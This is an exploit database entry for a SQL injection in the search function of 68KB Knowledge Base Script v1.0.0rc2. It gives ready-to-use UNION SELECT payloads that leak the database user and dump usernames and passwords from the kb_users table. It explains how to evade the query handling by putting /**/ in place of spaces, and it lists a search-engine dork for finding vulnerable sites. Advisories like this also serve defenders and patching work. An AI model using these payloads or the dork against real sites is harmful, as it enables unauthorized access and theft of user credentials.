68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection

Author: Jelmer de Hen
type: webapps
platform: php
port: 
date_added: 2010-03-27 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.com68kb-v1.0.0rc2.zip

Exploit Title: 68kb SQLI
Date: 2010-03-28
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
Version: v1.0.0rc2

Go to /search
and search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15#
Don't use spaces in the injection because they change the sql query in a way which makes the injection nearly impossible; instead use /**/.
Here is an example how to select usernames and password if the default prefix of kb_ is used during the installation:
search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users#

Dork: "Powered by 68kb"

-Jelmer de Hen